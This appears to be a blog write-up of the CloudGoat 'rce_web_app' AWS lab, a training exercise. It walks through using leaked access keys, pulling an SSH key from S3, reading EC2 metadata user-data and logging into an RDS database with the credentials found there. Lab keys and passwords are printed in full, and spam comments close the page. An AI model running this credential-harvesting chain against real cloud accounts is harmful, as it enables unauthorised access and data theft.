CloudGoatChallenges - RCE Web App
Rhino Security released the CloudGoat2 “Vulnerable by Design” AWS deployment tool and along with same they included new attack scenario to learn and practise. Then they also announced about #CloudGoatChallenges on Twitter to win "Hands-On AWS Penetration Testing with Kali Linux" book copy and some cool Rhino swag.
Below is my approach to solve the challenge.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##We git clone the brand new Cloudgoat2 from github. | |
| https://github.com/RhinoSecurityLabs/cloudgoat | |
| ##Then we apply whitelist our public IP address and created the rce_web_app scenario in our AWS infra | |
| python3 cloudgoat.py config whitelist | |
| python3 cloudgoat.py create rce_web_app --profile cloudgoat | |
| ##If all goes well, we got below keys to perform further attack. | |
| cloudgoat_output_aws_account_id = 680000000314 | |
| cloudgoat_output_lara_access_key_id = AKIA2BJCOSNNDASHCH73 | |
| cloudgoat_output_lara_secret_key = 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 | |
| cloudgoat_output_mcduck_access_key_id = AKIA2BJCOSNNC65DAET3 | |
| cloudgoat_output_mcduck_secret_key = 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 | |
| ##Then we configure the McDuck profile from above obtained keys | |
| root@kali:~/Desktop/cloudgoat# aws configure --profile McDuck | |
| AWS Access Key ID [****************SNME]: AKIA2BJCOSNNC65DAET3 | |
| AWS Secret Access Key [****************xvWU]: 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 | |
| Default region name [us-east-1]: | |
| Default output format [json]: | |
| ##Then we list the S3 bucket accessible to McDuck user. | |
| root@kali:~/Desktop/cloudgoat# aws s3 ls --profile McDuck | |
| 2019-06-26 02:04:07 cg-keystore-s3-bucket-cgidns0w17zkhn | |
| 2019-06-26 02:04:07 cg-logs-s3-bucket-cgidns0w17zkhn | |
| 2019-06-26 02:04:09 cg-secret-s3-bucket-cgidns0w17zkhn | |
| ##Lets dig in each accessible S3 bucket | |
| root@kali:~/Desktop/cloudgoat# aws s3 ls s3://cg-logs-s3-bucket-cgidns0w17zkhn --recursive --profile McDuck | |
| An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied | |
| root@kali:~/Desktop/cloudgoat# aws s3 ls s3://cg-secret-s3-bucket-cgidns0w17zkhn --recursive --profile McDuck | |
| An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied | |
| root@kali:~/Desktop/cloudgoat# aws s3 ls s3://cg-keystore-s3-bucket-cgidns0w17zkhn --recursive --profile McDuck | |
| 2019-06-26 02:04:23 3243 cloudgoat | |
| 2019-06-26 02:04:22 735 cloudgoat.pub | |
| ##Then we download the keys from the accessible bucket. | |
| root@kali:~/Desktop/cloudgoat# aws s3 cp s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat . --profile McDuck | |
| download: s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat to ./cloudgoat | |
| root@kali:~/Desktop/cloudgoat# aws s3 cp s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat.pub . --profile McDuck | |
| download: s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat.pub to ./cloudgoat.pub | |
| ##Lets see information about the EC2 instance accissible to our user. | |
| root@kali:~/Desktop/cloudgoat# aws ec2 describe-instances --profile McDuck | |
| { | |
| "Reservations": [ | |
| { | |
| "Instances": [ | |
| { | |
| "Monitoring": { | |
| "State": "disabled" | |
| }, | |
| "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com", | |
| "State": { | |
| "Code": 16, | |
| "Name": "running" | |
| }, | |
| "EbsOptimized": false, | |
| "LaunchTime": "2019-06-26T06:07:53.000Z", | |
| "PublicIpAddress": "3.87.79.133", | |
| "PrivateIpAddress": "10.0.10.194", | |
| "ProductCodes": [], | |
| "VpcId": "vpc-0a5f8e5b3bf5f037e", | |
| "CpuOptions": { | |
| "CoreCount": 1, | |
| "ThreadsPerCore": 1 | |
| }, | |
| "StateTransitionReason": "", | |
| "InstanceId": "i-05cc83b7828ed5966", | |
| "EnaSupport": true, | |
| "ImageId": "ami-0a313d6098716f372", | |
| "PrivateDnsName": "ip-10-0-10-194.ec2.internal", | |
| "KeyName": "cg-ec2-key-pair-cgidns0w17zkhn", | |
| "SecurityGroups": [ | |
| { | |
| "GroupName": "cg-ec2-ssh-cgidns0w17zkhn", | |
| "GroupId": "sg-0d322da579bdf4df7" | |
| }, | |
| { | |
| "GroupName": "cg-ec2-http-cgidns0w17zkhn", | |
| "GroupId": "sg-0ee3c46e0512c5a85" | |
| } | |
| ], | |
| "ClientToken": "", | |
| "SubnetId": "subnet-023cbc7682bbe438d", | |
| "InstanceType": "t2.micro", | |
| "CapacityReservationSpecification": { | |
| "CapacityReservationPreference": "open" | |
| }, | |
| "NetworkInterfaces": [ | |
| { | |
| "Status": "in-use", | |
| "MacAddress": "0a:aa:9c:ff:d1:7c", | |
| "SourceDestCheck": true, | |
| "VpcId": "vpc-0a5f8e5b3bf5f037e", | |
| "Description": "", | |
| "NetworkInterfaceId": "eni-0b91d3e5840d4ae98", | |
| "PrivateIpAddresses": [ | |
| { | |
| "PrivateDnsName": "ip-10-0-10-194.ec2.internal", | |
| "PrivateIpAddress": "10.0.10.194", | |
| "Primary": true, | |
| "Association": { | |
| "PublicIp": "3.87.79.133", | |
| "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com", | |
| "IpOwnerId": "amazon" | |
| } | |
| } | |
| ], | |
| "PrivateDnsName": "ip-10-0-10-194.ec2.internal", | |
| "Attachment": { | |
| "Status": "attached", | |
| "DeviceIndex": 0, | |
| "DeleteOnTermination": true, | |
| "AttachmentId": "eni-attach-038e6c2e4b46cff6e", | |
| "AttachTime": "2019-06-26T06:07:53.000Z" | |
| }, | |
| "Groups": [ | |
| { | |
| "GroupName": "cg-ec2-ssh-cgidns0w17zkhn", | |
| "GroupId": "sg-0d322da579bdf4df7" | |
| }, | |
| { | |
| "GroupName": "cg-ec2-http-cgidns0w17zkhn", | |
| "GroupId": "sg-0ee3c46e0512c5a85" | |
| } | |
| ], | |
| "Ipv6Addresses": [], | |
| "OwnerId": "680000000314", | |
| "PrivateIpAddress": "10.0.10.194", | |
| "SubnetId": "subnet-023cbc7682bbe438d", | |
| "Association": { | |
| "PublicIp": "3.87.79.133", | |
| "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com", | |
| "IpOwnerId": "amazon" | |
| } | |
| } | |
| ], | |
| "SourceDestCheck": true, | |
| "Placement": { | |
| "Tenancy": "default", | |
| "GroupName": "", | |
| "AvailabilityZone": "us-east-1a" | |
| }, | |
| "Hypervisor": "xen", | |
| "BlockDeviceMappings": [ | |
| { | |
| "DeviceName": "/dev/sda1", | |
| "Ebs": { | |
| "Status": "attached", | |
| "DeleteOnTermination": true, | |
| "VolumeId": "vol-0004c7cc152ba6879", | |
| "AttachTime": "2019-06-26T06:07:54.000Z" | |
| } | |
| } | |
| ], | |
| "Architecture": "x86_64", | |
| "RootDeviceType": "ebs", | |
| "IamInstanceProfile": { | |
| "Id": "AIPA2BJCOSNNHWT76ND4T", | |
| "Arn": "arn:aws:iam::680000000314:instance-profile/cg-ec2-instance-profile-cgidns0w17zkhn" | |
| }, | |
| "RootDeviceName": "/dev/sda1", | |
| "VirtualizationType": "hvm", | |
| "Tags": [ | |
| { | |
| "Value": "cg-ubuntu-ec2-cgidns0w17zkhn", | |
| "Key": "Name" | |
| } | |
| ], | |
| "HibernationOptions": { | |
| "Configured": false | |
| }, | |
| "AmiLaunchIndex": 0 | |
| } | |
| ], | |
| "ReservationId": "r-0a2cbcbbf6e82f52f", | |
| "Groups": [], | |
| "OwnerId": "680000000314" | |
| } | |
| ] | |
| } | |
| ##Changing the permission on key file | |
| root@kali:~/Desktop/cloudgoat# chmod 400 cloudgoat | |
| ##Connecting to the EC2 instance using key | |
| root@kali:~/Desktop/cloudgoat# ssh -i cloudgoat ubuntu@ec2-3-78-97-133.compute-1.amazonaws.com | |
| The authenticity of host 'ec2-3-78-97-133.compute-1.amazonaws.com (3.87.79.133)' can't be established. | |
| ECDSA key fingerprint is SHA256:A653IVLxTmfpSPEPAWZfCe0bWRjZ6AxE/F6AhNh+IY0. | |
| Are you sure you want to continue connecting (yes/no)? yes | |
| Warning: Permanently added 'ec2-3-78-97-133.compute-1.amazonaws.com,3.87.79.133' (ECDSA) to the list of known hosts. | |
| Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-1032-aws x86_64) | |
| * Documentation: https://help.ubuntu.com | |
| * Management: https://landscape.canonical.com | |
| * Support: https://ubuntu.com/advantage | |
| System information as of Wed Jun 26 06:18:36 UTC 2019 | |
| System load: 0.0 Processes: 96 | |
| Usage of /: 17.8% of 7.69GB Users logged in: 0 | |
| Memory usage: 18% IP address for eth0: 10.0.10.194 | |
| Swap usage: 0% | |
| Get cloud support with Ubuntu Advantage Cloud Guest: | |
| http://www.ubuntu.com/business/services/cloud | |
| 149 packages can be updated. | |
| 71 updates are security updates. | |
| To run a command as administrator (user "root"), use "sudo <command>". | |
| See "man sudo_root" for details. | |
| #Checking for any meta-data | |
| ubuntu@ip-10-0-10-194:~$ curl http://169.254.169.254/latest/user-data | |
| #!/bin/bash | |
| apt-get update | |
| curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash - | |
| apt-get install -y nodejs postgresql-client unzip | |
| psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat \ | |
| -c "CREATE TABLE sensitive_information (name VARCHAR(50) NOT NULL, value VARCHAR(50) NOT NULL);" | |
| psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat \ | |
| -c "INSERT INTO sensitive_information (name,value) VALUES ('Super-secret-passcode',E'V\!C70RY-4hy2809gnbv40h8g4b');" | |
| sleep 15s | |
| cd /home/ubuntu | |
| unzip app.zip -d ./app | |
| cd app | |
| node index.js & | |
| echo -e "\n* * * * * root node /home/ubuntu/app/index.js &\n* * * * * root sleep 10; curl GET http://cg-lb-cgidns0w17zkhn-544788922.us-east-1.elb.amazonaws.com/mkja1xijqf0abo1h9glg.html &\n* * * * * root sleep 10; node /home/ubuntu/app/index.js &\n* * * * * root sleep 20; node /home/ubuntu/app/index.js &\n* * * * * root sleep 30; node /home/ubuntu/app/index.js &\n* * * * * root sleep 40; node /home/ubuntu/app/index.js &\n* * * * * root sleep 50; node /home/ubuntu/app/index.js &\n" >> /etc/crontab | |
| #From above meta-data we got some credentials for Postgresql rds and then we connect using same | |
| ubuntu@ip-10-0-10-194:~$ psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat | |
| psql (10.9 (Ubuntu 10.9-0ubuntu0.18.04.1), server 9.6.11) | |
| SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off) | |
| Type "help" for help. | |
| cloudgoat=> \dt | |
| List of relations | |
| Schema | Name | Type | Owner | |
| --------+-----------------------+-------+--------- | |
| public | sensitive_information | table | cgadmin | |
| (1 row) | |
| cloudgoat=> select * from sensitive_information; | |
| name | value | |
| -----------------------+---------------------------- | |
| Super-secret-passcode | V!C70RY-4hy2809gnbv40h8g4b | |
| (1 row) | |
| cloudgoat=> | |
| #We obtained the Flag of the challenge - V!C70RY-4hy2809gnbv40h8g4b | |
| #Then we destroy the deployed rce_web_app using below command | |
| python3 cloudgoat.py destroy all --profile cloudgoat | |
| #Wait for this output to populate on your screen | |
| Destroy complete! Resources: 45 destroyed. | |
| [cloudgoat] terraform destroy completed with no error code. | |
| Successfully destroyed rce_web_app. | |
| Scenario instance files have been moved to /root/Desktop/cloudgoat/trash/rce_web_app_cgidns0w17zkhn | |
| Destruction complete. | |
| 1 scenarios successfully destroyed | |
| 0 destroys failed | |
| 0 skipped |
Happy Hacking !!
Excellent job, this is important information which is shared by you. This information is meaningful and factual for us to increase our knowledge about it. Always keep sharing this type of information. Thanks.Commercial Security systems West Midlands
ReplyDeleteThis is excellent information which is shared by you. This information is meaningful and magnificent for us to increase our knowledge about it. Keep sharing this kind of information. Thank you. CCTV Repairs Worcester Park
ReplyDeleteTheir scheme, their play against the on line casino, was perhaps 1xbet too sophisticated to tug off, Grosjean would later concede. Regardless of the variation you choose to play, the essential premise remains the identical. Place bets on where you think the ball will land on the spinning wheel. They design the studio space, hire the sellers, and choose the dealer’s uniform.
ReplyDeleteDownload gb insta pro for a premium Instagram experience! Enjoy advanced features like ad-free browsing, media downloads, and customization. Safe, fast, and easy to install for Android users.
ReplyDelete